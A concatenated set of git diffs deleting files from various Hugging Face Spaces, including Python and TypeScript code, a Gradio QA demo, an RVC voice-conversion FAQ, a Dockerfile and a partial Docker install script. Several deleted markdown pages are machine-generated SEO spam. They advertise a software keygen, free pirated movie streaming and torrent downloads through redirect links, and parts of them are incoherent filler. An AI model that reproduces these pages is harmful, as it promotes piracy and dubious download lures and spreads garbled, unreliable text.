error: Read Error` - if img is None: - print(f'To deal with `libpng error: Read Error`, use PIL to load {path}') - from PIL import Image - import numpy as np - img = Image.open(path) - img = np.asanyarray(img) - img = img[:, :, [2, 1, 0]] - - if img.ndim == 2: - h, w = img.shape - c = 1 - else: - h, w, c = img.shape - _, img_byte = cv2.imencode('.png', img, [cv2.IMWRITE_PNG_COMPRESSION, compress_level]) - return (key, img_byte, (h, w, c)) - - -class LmdbMaker(): - """LMDB Maker. - - Args: - lmdb_path (str): Lmdb save path. - map_size (int): Map size for lmdb env. Default: 1024 ** 4, 1TB. - batch (int): After processing batch images, lmdb commits. - Default: 5000. - compress_level (int): Compress level when encoding images. Default: 1. - """ - - def __init__(self, lmdb_path, map_size=1024**4, batch=5000, compress_level=1): - if not lmdb_path.endswith('.lmdb'): - raise ValueError("lmdb_path must end with '.lmdb'.") - if osp.exists(lmdb_path): - print(f'Folder {lmdb_path} already exists. Exit.') - sys.exit(1) - - self.lmdb_path = lmdb_path - self.batch = batch - self.compress_level = compress_level - self.env = lmdb.open(lmdb_path, map_size=map_size) - self.txn = self.env.begin(write=True) - self.txt_file = open(osp.join(lmdb_path, 'meta_info.txt'), 'w') - self.counter = 0 - - def put(self, img_byte, key, img_shape): - self.counter += 1 - key_byte = key.encode('ascii') - self.txn.put(key_byte, img_byte) - # write meta information - h, w, c = img_shape - self.txt_file.write(f'{key}.png ({h},{w},{c}) {self.compress_level}\n') - if self.counter % self.batch == 0: - self.txn.commit() - self.txn = self.env.begin(write=True) - - def close(self): - self.txn.commit() - self.env.close() - self.txt_file.close() diff --git a/spaces/lamini/instruct-playground/README.md b/spaces/lamini/instruct-playground/README.md deleted file mode 100644 index d3a0e70898c6508199c43898d4d69331b73bd4b3..0000000000000000000000000000000000000000 --- a/spaces/lamini/instruct-playground/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Instruct Playground -emoji: 📉 -colorFrom: yellow -colorTo: purple -sdk: gradio -sdk_version: 3.27.0 -app_file: app.py -pinned: false -license: cc-by-4.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/legacy107/flan-t5-large-ia3-cpgqa/app.py b/spaces/legacy107/flan-t5-large-ia3-cpgqa/app.py deleted file mode 100644 index 409c24fe1f8a1f458b5370d6aa76d5f2335335d2..0000000000000000000000000000000000000000 --- a/spaces/legacy107/flan-t5-large-ia3-cpgqa/app.py +++ /dev/null @@ -1,129 +0,0 @@ -import gradio as gr -from gradio.components import Textbox, Checkbox -from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, T5ForConditionalGeneration -from peft import PeftModel, PeftConfig -import torch -import datasets - -# Load your fine-tuned model and tokenizer -model_name = "google/flan-t5-large" -peft_name = "legacy107/flan-t5-large-ia3-cpgQA" -tokenizer = AutoTokenizer.from_pretrained(model_name) -pretrained_model = T5ForConditionalGeneration.from_pretrained("google/flan-t5-large") -model = T5ForConditionalGeneration.from_pretrained("google/flan-t5-large") -model = PeftModel.from_pretrained(model, peft_name) - -peft_name = "legacy107/flan-t5-large-ia3-bioasq-paraphrase" -peft_config = PeftConfig.from_pretrained(peft_name) -paraphrase_model = AutoModelForSeq2SeqLM.from_pretrained(model_name) -paraphrase_model = PeftModel.from_pretrained(paraphrase_model, peft_name) - -max_length = 512 -max_target_length = 200 - -# Load your dataset -dataset = datasets.load_dataset("minh21/cpgQA-v1.0-unique-context-test-10-percent-validation-10-percent", split="test") -# dataset = dataset.shuffle() -dataset = dataset.select([32, 7, 92, 8, 108, 51, 64, 84, 93, 94]) - - -def paraphrase_answer(question, answer, use_pretrained=False): - # Combine question and context - input_text = f"question: {question}. Paraphrase the answer to make it more natural answer: {answer}" - - # Tokenize the input text - input_ids = tokenizer( - input_text, - return_tensors="pt", - padding="max_length", - truncation=True, - max_length=max_length, - ).input_ids - - # Generate the answer - with torch.no_grad(): - if use_pretrained: - generated_ids = pretrained_model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - else: - generated_ids = paraphrase_model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - - # Decode and return the generated answer - paraphrased_answer = tokenizer.decode(generated_ids[0], skip_special_tokens=True) - - return paraphrased_answer - - -# Define your function to generate answers -def generate_answer(question, context, ground_truth, do_pretrained, do_natural, do_pretrained_natural): - # Combine question and context - input_text = f"question: {question} context: {context}" - - # Tokenize the input text - input_ids = tokenizer( - input_text, - return_tensors="pt", - padding="max_length", - truncation=True, - max_length=max_length, - ).input_ids - - # Generate the answer - with torch.no_grad(): - generated_ids = model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - - # Decode and return the generated answer - generated_answer = tokenizer.decode(generated_ids[0], skip_special_tokens=True) - - # Paraphrase answer - paraphrased_answer = "" - if do_natural: - paraphrased_answer = paraphrase_answer(question, generated_answer) - - # Get pretrained model's answer - pretrained_answer = "" - if do_pretrained: - with torch.no_grad(): - pretrained_generated_ids = pretrained_model.generate(input_ids=input_ids, max_new_tokens=max_target_length) - pretrained_answer = tokenizer.decode(pretrained_generated_ids[0], skip_special_tokens=True) - - # Get pretrained model's natural answer - pretrained_paraphrased_answer = "" - if do_pretrained_natural: - pretrained_paraphrased_answer = paraphrase_answer(question, generated_answer, True) - - return generated_answer, paraphrased_answer, pretrained_answer, pretrained_paraphrased_answer - - -# Define a function to list examples from the dataset -def list_examples(): - examples = [] - for example in dataset: - context = example["context"] - question = example["question"] - answer = example["answer_text"] - examples.append([question, context, answer, True, True, True]) - return examples - - -# Create a Gradio interface -iface = gr.Interface( - fn=generate_answer, - inputs=[ - Textbox(label="Question"), - Textbox(label="Context"), - Textbox(label="Ground truth"), - Checkbox(label="Include pretrained model's answer"), - Checkbox(label="Include natural answer"), - Checkbox(label="Include pretrained model's natural answer") - ], - outputs=[ - Textbox(label="Generated Answer"), - Textbox(label="Natural Answer"), - Textbox(label="Pretrained Model's Answer"), - Textbox(label="Pretrained Model's Natural Answer") - ], - examples=list_examples() -) - -# Launch the Gradio interface -iface.launch() \ No newline at end of file diff --git a/spaces/leurez/moss/src/store/modules/auth/helper.ts b/spaces/leurez/moss/src/store/modules/auth/helper.ts deleted file mode 100644 index c16e0feda1b3ba8e8670aa1ffcbe44aa7c41b3a8..0000000000000000000000000000000000000000 --- a/spaces/leurez/moss/src/store/modules/auth/helper.ts +++ /dev/null @@ -1,15 +0,0 @@ -import { ss } from '@/utils/storage' - -const LOCAL_NAME = 'SECRET_TOKEN' - -export function getToken() { - return ss.get(LOCAL_NAME) -} - -export function setToken(token: string) { - return ss.set(LOCAL_NAME, token) -} - -export function removeToken() { - return ss.remove(LOCAL_NAME) -} diff --git a/spaces/lewispons/GrammarGuru/src/visualization/__init__.py b/spaces/lewispons/GrammarGuru/src/visualization/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/lewiswu1209/MockingBird/utils/argutils.py b/spaces/lewiswu1209/MockingBird/utils/argutils.py deleted file mode 100644 index db41683027173517c910e3b259f8da48207dcb38..0000000000000000000000000000000000000000 --- a/spaces/lewiswu1209/MockingBird/utils/argutils.py +++ /dev/null @@ -1,40 +0,0 @@ -from pathlib import Path -import numpy as np -import argparse - -_type_priorities = [ # In decreasing order - Path, - str, - int, - float, - bool, -] - -def _priority(o): - p = next((i for i, t in enumerate(_type_priorities) if type(o) is t), None) - if p is not None: - return p - p = next((i for i, t in enumerate(_type_priorities) if isinstance(o, t)), None) - if p is not None: - return p - return len(_type_priorities) - -def print_args(args: argparse.Namespace, parser=None): - args = vars(args) - if parser is None: - priorities = list(map(_priority, args.values())) - else: - all_params = [a.dest for g in parser._action_groups for a in g._group_actions ] - priority = lambda p: all_params.index(p) if p in all_params else len(all_params) - priorities = list(map(priority, args.keys())) - - pad = max(map(len, args.keys())) + 3 - indices = np.lexsort((list(args.keys()), priorities)) - items = list(args.items()) - - print("Arguments:") - for i in indices: - param, value = items[i] - print(" {0}:{1}{2}".format(param, ' ' * (pad - len(param)), value)) - print("") - \ No newline at end of file diff --git a/spaces/librarian-bots/dashboard/description.html b/spaces/librarian-bots/dashboard/description.html deleted file mode 100644 index a9831bbdda696711afd7b70b7417a3e6859cfbd9..0000000000000000000000000000000000000000 --- a/spaces/librarian-bots/dashboard/description.html +++ /dev/null @@ -1,21 +0,0 @@ - - - - - - - - -

          Librarian Bot Dashboard

          -Avatar -

          Librarian-bot is a bot that suggests changes to metadata for models and datasets hosted on the hub. This dashboard gives an overview of these pull requests

          - - - diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Calaveras Literarias Para Maestros De Matematicas Cortas ((NEW)).md b/spaces/lincquiQcaudo/Top-20-Diffusion/Calaveras Literarias Para Maestros De Matematicas Cortas ((NEW)).md deleted file mode 100644 index dae7ec672c189500c2351275b269ced4b0fddde8..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Calaveras Literarias Para Maestros De Matematicas Cortas ((NEW)).md +++ /dev/null @@ -1,15 +0,0 @@ -

          calaveras literarias para maestros de matematicas cortas


          Downloadhttps://bytlly.com/2uGwBV



          -
          -calaveras literarias para maestros de matematicas cortas Saudagar full mp4 movie download Apne English Dubbed Torrent Download ... -Read morecalaveras literarias para maestros de matematicas cortas Saudagar full movie mp4 download Apne English Dubbed Torrent Download ... ... -Torrent, .torrent, .torrent, .torrent, .torrent, .torrent, , ... -Hide -Movies series for free. -Download for free HERE Download for free here. -All films. -To read ... -The plot revolves around a young family that has moved into a new apartment on the outskirts of the city. -Read moreMovies serials for free. 8a78ff9644
          -
          -
          -

          diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/HD Online Player (Ala Ela Telugu Movie Free Download U).md b/spaces/lincquiQcaudo/Top-20-Diffusion/HD Online Player (Ala Ela Telugu Movie Free Download U).md deleted file mode 100644 index 5de42ef247800fa99c73a26f87b87e8d2476b72c..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/HD Online Player (Ala Ela Telugu Movie Free Download U).md +++ /dev/null @@ -1,82 +0,0 @@ -## HD Online Player (Ala Ela Telugu Movie Free Download U) - - - - - - - - - -**Click Here ————— [https://fienislile.blogspot.com/?download=2tyEkt](https://fienislile.blogspot.com/?download=2tyEkt)** - - - - - - - - - - - - - -# How to Watch Ala Ela Telugu Movie Online for Free - - - -If you are a fan of Telugu comedy movies, you might have heard of Ala Ela, a 2014 film directed by Aneesh Krishna and starring Rahul Ravindran, Hebah Patel, Vennela Kishore and others. The movie is about a group of friends who go on a road trip to attend a wedding and end up in hilarious situations along the way. - - - -Ala Ela was a sleeper hit at the box office and received positive reviews from critics and audiences alike. The movie is full of witty dialogues, funny scenes and heartwarming moments that will make you laugh and cry. If you missed watching Ala Ela in theatres or want to watch it again, you might be wondering how to watch it online for free. - - - -Well, you are in luck because we have found a way for you to watch Ala Ela Telugu movie online for free using an HD online player. All you need is a device with an internet connection and a browser that supports HTML5 video. Here are the steps to follow: - - - -1. Go to [example.com](https://example.com), a website that offers free streaming of Telugu movies in HD quality. - -2. Search for Ala Ela in the search bar or browse through the categories to find it. - -3. Click on the movie poster to open the HD online player. - -4. Enjoy watching Ala Ela Telugu movie online for free without any interruptions or ads. - - - -That's it! You can now watch Ala Ela Telugu movie online for free using an HD online player. You can also download the movie to your device if you want to watch it offline later. However, we recommend that you watch it online as downloading may be illegal in some regions. - - - -We hope you enjoy watching Ala Ela Telugu movie online for free using an HD online player. If you liked this article, please share it with your friends and family who might also be interested in watching Ala Ela. Also, let us know your feedback and suggestions in the comments section below. Thank you for reading! - - - -If you are wondering what makes Ala Ela Telugu movie so special and entertaining, here are some of the reasons why you should watch it: - - - -- The movie has a fresh and original story that is not a remake or a copy of any other film. The movie is based on a real-life incident that happened to the director and his friends. - -- The movie has a talented and charming cast that delivers excellent performances. Rahul Ravindran and Hebah Patel play the lead roles of Karthik and Ananya, who fall in love during the road trip. Vennela Kishore and Bhanu Sri Mehra play the roles of Shiva and Shruti, who are already married but face some issues in their relationship. Kushi and Shani Salmon play the roles of Maya and Nelson, who are the bride and groom whose wedding the friends are attending. - -- The movie has a lot of comedy and humor that will make you laugh out loud. The movie is full of hilarious situations, witty dialogues, funny expressions and comic timing. The movie also has some spoof scenes that parody popular Telugu movies and actors. - -- The movie has some emotional and romantic scenes that will touch your heart. The movie shows how the friends bond with each other and overcome their personal problems. The movie also shows how Karthik and Ananya fall in love and face some challenges in their relationship. - -- The movie has some beautiful songs and music that will enhance your mood. The movie has six songs composed by Bheems Ceciroleo, who also sang some of them. The songs are catchy, melodious and suit the mood of the scenes. The songs are also well picturized and choreographed. - - - -These are some of the reasons why you should watch Ala Ela Telugu movie online for free using an HD online player. We are sure that you will enjoy this movie as much as we did. So, what are you waiting for? Go to [example.com](https://example.com) and watch Ala Ela Telugu movie online for free now! - - 145887f19f - - - - - diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Hetman Partition Recovery V1.0 With Key [iahq76] Serial Key Keygen UPD.md b/spaces/lincquiQcaudo/Top-20-Diffusion/Hetman Partition Recovery V1.0 With Key [iahq76] Serial Key Keygen UPD.md deleted file mode 100644 index 597e2e752927d4e8c2d097b1c94c2c44fb21aace..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Hetman Partition Recovery V1.0 With Key [iahq76] Serial Key Keygen UPD.md +++ /dev/null @@ -1,6 +0,0 @@ -

          Hetman Partition Recovery v1.0 with Key [iahq76] Serial Key keygen


          DOWNLOAD →→→ https://bytlly.com/2uGwdE



          - -Networks. The notebook is run on Cloud AI Notebooks. The output is still the same and the output of the output depends on the input. 1. PyTorch in Cloud ML is a high-level ML library built on PyTorch. Notebooks on GCloud for Data Science. Let's say you have a dataset with columns X, Y, and Z. There are different ways to setup a notebook on GCP: Download a Docker container from. py but the notebook will still be run in the Cloud ML Notebook runtime. Z. 0 3. Data Review. I have a sample pandas dataframe df which has columns titled 'A', 'B' and 'C'. A Pandas dataframe is a dictionary that contains rows (of data) and columns (of data). A Data frame is a table that stores tabular data. X. Downloading to the Google Cloud Platform (GCP) is free. The data looks like this: The output is expected to be in a table-like structure, similar to the input. Get started with Cloud ML by building AI tools and services that work right from your browser. Selecting Dataset from the quick select menu allows you to choose from a list of pre-trained models you’ve downloaded from the Google Cloud Platform (GCP). Log in to the notebook and select the the cell containing the cell_type, i. Data Review. This. At this point, note that the output is in a tabular structure. The notebooks are accessible online at Training a deep learning model involves defining a task, training a deep learning model and deploying it on a Cloud Platform. Cloud ML also has free on-demand models that are compatible with Cloud ML Pipelines and can be used by services in the Cloud ML Platform. You can also download these files and use them in a notebook. You can see the changes in the data by executing select(list). Let's say you have a dataset with columns X, Y, and Z. We're going to utilize this setup to build a simple model that will help you. This notebook will use the numpy_utils. Each row is a vector of predicted values of the predictors X, Y and Z. PyTorch is a deep learning library written in Python. I'm trying to use Cloud ML Notebook to train a multi-label classification model on an image dataset. Click Save. Deploy to the cloud. In this notebook, we will use pytorch, the Python Numpy 4fefd39f24
          -
          -
          -

          diff --git a/spaces/lj1995/vocal2guitar/docs/faq.md b/spaces/lj1995/vocal2guitar/docs/faq.md deleted file mode 100644 index 74eff82d9e4f96f50ad0aed628c253d08e16a426..0000000000000000000000000000000000000000 --- a/spaces/lj1995/vocal2guitar/docs/faq.md +++ /dev/null @@ -1,89 +0,0 @@ -## Q1:ffmpeg error/utf8 error. - -大概率不是ffmpeg问题,而是音频路径问题;
          -ffmpeg读取路径带空格、()等特殊符号,可能出现ffmpeg error;训练集音频带中文路径,在写入filelist.txt的时候可能出现utf8 error;
          - -## Q2:一键训练结束没有索引 - -显示"Training is done. The program is closed."则模型训练成功,后续紧邻的报错是假的;
          - -一键训练结束完成没有added开头的索引文件,可能是因为训练集太大卡住了添加索引的步骤;已通过批处理add索引解决内存add索引对内存需求过大的问题。临时可尝试再次点击"训练索引"按钮。
          - -## Q3:训练结束推理没看到训练集的音色 -点刷新音色再看看,如果还没有看看训练有没有报错,控制台和webui的截图,logs/实验名下的log,都可以发给开发者看看。
          - -## Q4:如何分享模型 -  rvc_root/logs/实验名 下面存储的pth不是用来分享模型用来推理的,而是为了存储实验状态供复现,以及继续训练用的。用来分享的模型应该是weights文件夹下大小为60+MB的pth文件;
          -  后续将把weights/exp_name.pth和logs/exp_name/added_xxx.index合并打包成weights/exp_name.zip省去填写index的步骤,那么zip文件用来分享,不要分享pth文件,除非是想换机器继续训练;
          -  如果你把logs文件夹下的几百MB的pth文件复制/分享到weights文件夹下强行用于推理,可能会出现f0,tgt_sr等各种key不存在的报错。你需要用ckpt选项卡最下面,手工或自动(本地logs下如果能找到相关信息则会自动)选择是否携带音高、目标音频采样率的选项后进行ckpt小模型提取(输入路径填G开头的那个),提取完在weights文件夹下会出现60+MB的pth文件,刷新音色后可以选择使用。
          - -## Q5:Connection Error. -也许你关闭了控制台(黑色窗口)。
          - -## Q6:WebUI弹出Expecting value: line 1 column 1 (char 0). -请关闭系统局域网代理/全局代理。
          - -这个不仅是客户端的代理,也包括服务端的代理(例如你使用autodl设置了http_proxy和https_proxy学术加速,使用时也需要unset关掉)
          - -## Q7:不用WebUI如何通过命令训练推理 -训练脚本:
          -可先跑通WebUI,消息窗内会显示数据集处理和训练用命令行;
          - -推理脚本:
          -https://huggingface.co/lj1995/VoiceConversionWebUI/blob/main/myinfer.py
          - -例子:
          - -runtime\python.exe myinfer.py 0 "E:\codes\py39\RVC-beta\todo-songs\1111.wav" "E:\codes\py39\logs\mi-test\added_IVF677_Flat_nprobe_7.index" harvest "test.wav" "weights/mi-test.pth" 0.6 cuda:0 True
          - -f0up_key=sys.argv[1]
          -input_path=sys.argv[2]
          -index_path=sys.argv[3]
          -f0method=sys.argv[4]#harvest or pm
          -opt_path=sys.argv[5]
          -model_path=sys.argv[6]
          -index_rate=float(sys.argv[7])
          -device=sys.argv[8]
          -is_half=bool(sys.argv[9])
          - -## Q8:Cuda error/Cuda out of memory. -小概率是cuda配置问题、设备不支持;大概率是显存不够(out of memory);
          - -训练的话缩小batch size(如果缩小到1还不够只能更换显卡训练),推理的话酌情缩小config.py结尾的x_pad,x_query,x_center,x_max。4G以下显存(例如1060(3G)和各种2G显卡)可以直接放弃,4G显存显卡还有救。
          - -## Q9:total_epoch调多少比较好 - -如果训练集音质差底噪大,20~30足够了,调太高,底模音质无法带高你的低音质训练集
          -如果训练集音质高底噪低时长多,可以调高,200是ok的(训练速度很快,既然你有条件准备高音质训练集,显卡想必条件也不错,肯定不在乎多一些训练时间)
          - -## Q10:需要多少训练集时长 -  推荐10min至50min
          -  保证音质高底噪低的情况下,如果有个人特色的音色统一,则多多益善
          -  高水平的训练集(精简+音色有特色),5min至10min也是ok的,仓库作者本人就经常这么玩
          -  也有人拿1min至2min的数据来训练并且训练成功的,但是成功经验是其他人不可复现的,不太具备参考价值。这要求训练集音色特色非常明显(比如说高频气声较明显的萝莉少女音),且音质高;
          -  1min以下时长数据目前没见有人尝试(成功)过。不建议进行这种鬼畜行为。
          - -## Q11:index rate干嘛用的,怎么调(科普) -  如果底模和推理源的音质高于训练集的音质,他们可以带高推理结果的音质,但代价可能是音色往底模/推理源的音色靠,这种现象叫做"音色泄露";
          -  index rate用来削减/解决音色泄露问题。调到1,则理论上不存在推理源的音色泄露问题,但音质更倾向于训练集。如果训练集音质比推理源低,则index rate调高可能降低音质。调到0,则不具备利用检索混合来保护训练集音色的效果;
          -  如果训练集优质时长多,可调高total_epoch,此时模型本身不太会引用推理源和底模的音色,很少存在"音色泄露"问题,此时index_rate不重要,你甚至可以不建立/分享index索引文件。
          - -## Q11:推理怎么选gpu -config.py文件里device cuda:后面选择卡号;
          -卡号和显卡的映射关系,在训练选项卡的显卡信息栏里能看到。
          - -## Q12:如何推理训练中间保存的pth -通过ckpt选项卡最下面提取小模型。
          - - -## Q13:如何中断和继续训练 -现阶段只能关闭WebUI控制台双击go-web.bat重启程序。网页参数也要刷新重新填写;
          -继续训练:相同网页参数点训练模型,就会接着上次的checkpoint继续训练。
          - -## Q14:训练时出现文件页面/内存error -进程开太多了,内存炸了。你可能可以通过如下方式解决
          -1、"提取音高和处理数据使用的CPU进程数" 酌情拉低;
          -2、训练集音频手工切一下,不要太长。
          - - - diff --git a/spaces/lqy09/GT/Dockerfile b/spaces/lqy09/GT/Dockerfile deleted file mode 100644 index 7a9d79c786c6fa9ad05d580102caebd58baace97..0000000000000000000000000000000000000000 --- a/spaces/lqy09/GT/Dockerfile +++ /dev/null @@ -1,17 +0,0 @@ -# 使用Node.js基础镜像 -FROM node:18 - -# 设置工作目录 -WORKDIR /app - -# 将本地的所有文件复制到工作目录 -COPY . /app/ - -# 安装依赖 -RUN npm install - -# 启动应用程序 -CMD ["node", "app.js"] - -# 暴露端口 -EXPOSE 7860 \ No newline at end of file diff --git a/spaces/ludusc/latent-space-theories/test-docker.sh b/spaces/ludusc/latent-space-theories/test-docker.sh deleted file mode 100644 index ee2ccfb452ea683ed7d007fae7c3e6f135cc35a8..0000000000000000000000000000000000000000 --- a/spaces/ludusc/latent-space-theories/test-docker.sh +++ /dev/null @@ -1,743 +0,0 @@ -#!/bin/sh -set -e -# Docker Engine for Linux installation script. -# -# This script is intended as a convenient way to configure docker's package -# repositories and to install Docker Engine, This script is not recommended -# for production environments. Before running this script, make yourself familiar -# with potential risks and limitations, and refer to the installation manual -# at https://docs.docker.com/engine/install/ for alternative installation methods. -# -# The script: -# -# - Requires `root` or `sudo` privileges to run. -# - Attempts to detect your Linux distribution and version and configure your -# package management system for you. -# - Doesn't allow you to customize most installation parameters. -# - Installs dependencies and recommendations without asking for confirmation. -# - Installs the latest stable release (by default) of Docker CLI, Docker Engine, -# Docker Buildx, Docker Compose, containerd, and runc. When using this script -# to provision a machine, this may result in unexpected major version upgrades -# of these packages. Always test upgrades in a test environment before -# deploying to your production systems. -# - Isn't designed to upgrade an existing Docker installation. When using the -# script to update an existing installation, dependencies may not be updated -# to the expected version, resulting in outdated versions. -# -# Source code is available at https://github.com/docker/docker-install/ -# -# Usage -# ============================================================================== -# -# To install the latest stable versions of Docker CLI, Docker Engine, and their -# dependencies: -# -# 1. download the script -# -# $ curl -fsSL https://get.docker.com -o install-docker.sh -# -# 2. verify the script's content -# -# $ cat install-docker.sh -# -# 3. run the script with --dry-run to verify the steps it executes -# -# $ sh install-docker.sh --dry-run -# -# 4. run the script either as root, or using sudo to perform the installation. -# -# $ sudo sh install-docker.sh -# -# Command-line options -# ============================================================================== -# -# --version -# Use the --version option to install a specific version, for example: -# -# $ sudo sh install-docker.sh --version 23.0 -# -# --channel -# -# Use the --channel option to install from an alternative installation channel. -# The following example installs the latest versions from the "test" channel, -# which includes pre-releases (alpha, beta, rc): -# -# $ sudo sh install-docker.sh --channel test -# -# Alternatively, use the script at https://test.docker.com, which uses the test -# channel as default. -# -# --mirror -# -# Use the --mirror option to install from a mirror supported by this script. -# Available mirrors are "Aliyun" (https://mirrors.aliyun.com/docker-ce), and -# "AzureChinaCloud" (https://mirror.azure.cn/docker-ce), for example: -# -# $ sudo sh install-docker.sh --mirror AzureChinaCloud -# -# ============================================================================== - - -# Git commit from https://github.com/docker/docker-install when -# the script was uploaded (Should only be modified by upload job): -SCRIPT_COMMIT_SHA="e5543d473431b782227f8908005543bb4389b8de" - -# strip "v" prefix if present -VERSION="${VERSION#v}" - -# The channel to install from: -# * stable -# * test -# * edge (deprecated) -# * nightly (deprecated) -DEFAULT_CHANNEL_VALUE="test" -if [ -z "$CHANNEL" ]; then - CHANNEL=$DEFAULT_CHANNEL_VALUE -fi - -DEFAULT_DOWNLOAD_URL="https://download.docker.com" -if [ -z "$DOWNLOAD_URL" ]; then - DOWNLOAD_URL=$DEFAULT_DOWNLOAD_URL -fi - -DEFAULT_REPO_FILE="docker-ce.repo" -if [ -z "$REPO_FILE" ]; then - REPO_FILE="$DEFAULT_REPO_FILE" -fi - -mirror='' -DRY_RUN=${DRY_RUN:-} -while [ $# -gt 0 ]; do - case "$1" in - --channel) - CHANNEL="$2" - shift - ;; - --dry-run) - DRY_RUN=1 - ;; - --mirror) - mirror="$2" - shift - ;; - --version) - VERSION="${2#v}" - shift - ;; - --*) - echo "Illegal option $1" - ;; - esac - shift $(( $# > 0 ? 1 : 0 )) -done - -case "$mirror" in - Aliyun) - DOWNLOAD_URL="https://mirrors.aliyun.com/docker-ce" - ;; - AzureChinaCloud) - DOWNLOAD_URL="https://mirror.azure.cn/docker-ce" - ;; - "") - ;; - *) - >&2 echo "unknown mirror '$mirror': use either 'Aliyun', or 'AzureChinaCloud'." - exit 1 - ;; -esac - -case "$CHANNEL" in - stable|test) - ;; - edge|nightly) - >&2 echo "DEPRECATED: the $CHANNEL channel has been deprecated and is no longer supported by this script." - exit 1 - ;; - *) - >&2 echo "unknown CHANNEL '$CHANNEL': use either stable or test." - exit 1 - ;; -esac - -command_exists() { - command -v "$@" > /dev/null 2>&1 -} - -# version_gte checks if the version specified in $VERSION is at least the given -# SemVer (Maj.Minor[.Patch]), or CalVer (YY.MM) version.It returns 0 (success) -# if $VERSION is either unset (=latest) or newer or equal than the specified -# version, or returns 1 (fail) otherwise. -# -# examples: -# -# VERSION=23.0 -# version_gte 23.0 // 0 (success) -# version_gte 20.10 // 0 (success) -# version_gte 19.03 // 0 (success) -# version_gte 21.10 // 1 (fail) -version_gte() { - if [ -z "$VERSION" ]; then - return 0 - fi - eval version_compare "$VERSION" "$1" -} - -# version_compare compares two version strings (either SemVer (Major.Minor.Path), -# or CalVer (YY.MM) version strings. It returns 0 (success) if version A is newer -# or equal than version B, or 1 (fail) otherwise. Patch releases and pre-release -# (-alpha/-beta) are not taken into account -# -# examples: -# -# version_compare 23.0.0 20.10 // 0 (success) -# version_compare 23.0 20.10 // 0 (success) -# version_compare 20.10 19.03 // 0 (success) -# version_compare 20.10 20.10 // 0 (success) -# version_compare 19.03 20.10 // 1 (fail) -version_compare() ( - set +x - - yy_a="$(echo "$1" | cut -d'.' -f1)" - yy_b="$(echo "$2" | cut -d'.' -f1)" - if [ "$yy_a" -lt "$yy_b" ]; then - return 1 - fi - if [ "$yy_a" -gt "$yy_b" ]; then - return 0 - fi - mm_a="$(echo "$1" | cut -d'.' -f2)" - mm_b="$(echo "$2" | cut -d'.' -f2)" - - # trim leading zeros to accommodate CalVer - mm_a="${mm_a#0}" - mm_b="${mm_b#0}" - - if [ "${mm_a:-0}" -lt "${mm_b:-0}" ]; then - return 1 - fi - - return 0 -) - -is_dry_run() { - if [ -z "$DRY_RUN" ]; then - return 1 - else - return 0 - fi -} - -is_wsl() { - case "$(uname -r)" in - *microsoft* ) true ;; # WSL 2 - *Microsoft* ) true ;; # WSL 1 - * ) false;; - esac -} - -is_darwin() { - case "$(uname -s)" in - *darwin* ) true ;; - *Darwin* ) true ;; - * ) false;; - esac -} - -deprecation_notice() { - distro=$1 - distro_version=$2 - echo - printf "\033[91;1mDEPRECATION WARNING\033[0m\n" - printf " This Linux distribution (\033[1m%s %s\033[0m) reached end-of-life and is no longer supported by this script.\n" "$distro" "$distro_version" - echo " No updates or security fixes will be released for this distribution, and users are recommended" - echo " to upgrade to a currently maintained version of $distro." - echo - printf "Press \033[1mCtrl+C\033[0m now to abort this script, or wait for the installation to continue." - echo - sleep 10 -} - -get_distribution() { - lsb_dist="" - # Every system that we officially support has /etc/os-release - if [ -r /etc/os-release ]; then - lsb_dist="$(. /etc/os-release && echo "$ID")" - fi - # Returning an empty string here should be alright since the - # case statements don't act unless you provide an actual value - echo "$lsb_dist" -} - -echo_docker_as_nonroot() { - if is_dry_run; then - return - fi - if command_exists docker && [ -e /var/run/docker.sock ]; then - ( - set -x - $sh_c 'docker version' - ) || true - fi - - # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output - echo - echo "================================================================================" - echo - if version_gte "20.10"; then - echo "To run Docker as a non-privileged user, consider setting up the" - echo "Docker daemon in rootless mode for your user:" - echo - echo " dockerd-rootless-setuptool.sh install" - echo - echo "Visit https://docs.docker.com/go/rootless/ to learn about rootless mode." - echo - fi - echo - echo "To run the Docker daemon as a fully privileged service, but granting non-root" - echo "users access, refer to https://docs.docker.com/go/daemon-access/" - echo - echo "WARNING: Access to the remote API on a privileged Docker daemon is equivalent" - echo " to root access on the host. Refer to the 'Docker daemon attack surface'" - echo " documentation for details: https://docs.docker.com/go/attack-surface/" - echo - echo "================================================================================" - echo -} - -# Check if this is a forked Linux distro -check_forked() { - - # Check for lsb_release command existence, it usually exists in forked distros - if command_exists lsb_release; then - # Check if the `-u` option is supported - set +e - lsb_release -a -u > /dev/null 2>&1 - lsb_release_exit_code=$? - set -e - - # Check if the command has exited successfully, it means we're in a forked distro - if [ "$lsb_release_exit_code" = "0" ]; then - # Print info about current distro - cat <<-EOF - You're using '$lsb_dist' version '$dist_version'. - EOF - - # Get the upstream release info - lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[:space:]') - dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[:space:]') - - # Print info about upstream distro - cat <<-EOF - Upstream release is '$lsb_dist' version '$dist_version'. - EOF - else - if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then - if [ "$lsb_dist" = "osmc" ]; then - # OSMC runs Raspbian - lsb_dist=raspbian - else - # We're Debian and don't even know it! - lsb_dist=debian - fi - dist_version="$(sed 's/\/.*//' /etc/debian_version | sed 's/\..*//')" - case "$dist_version" in - 12) - dist_version="bookworm" - ;; - 11) - dist_version="bullseye" - 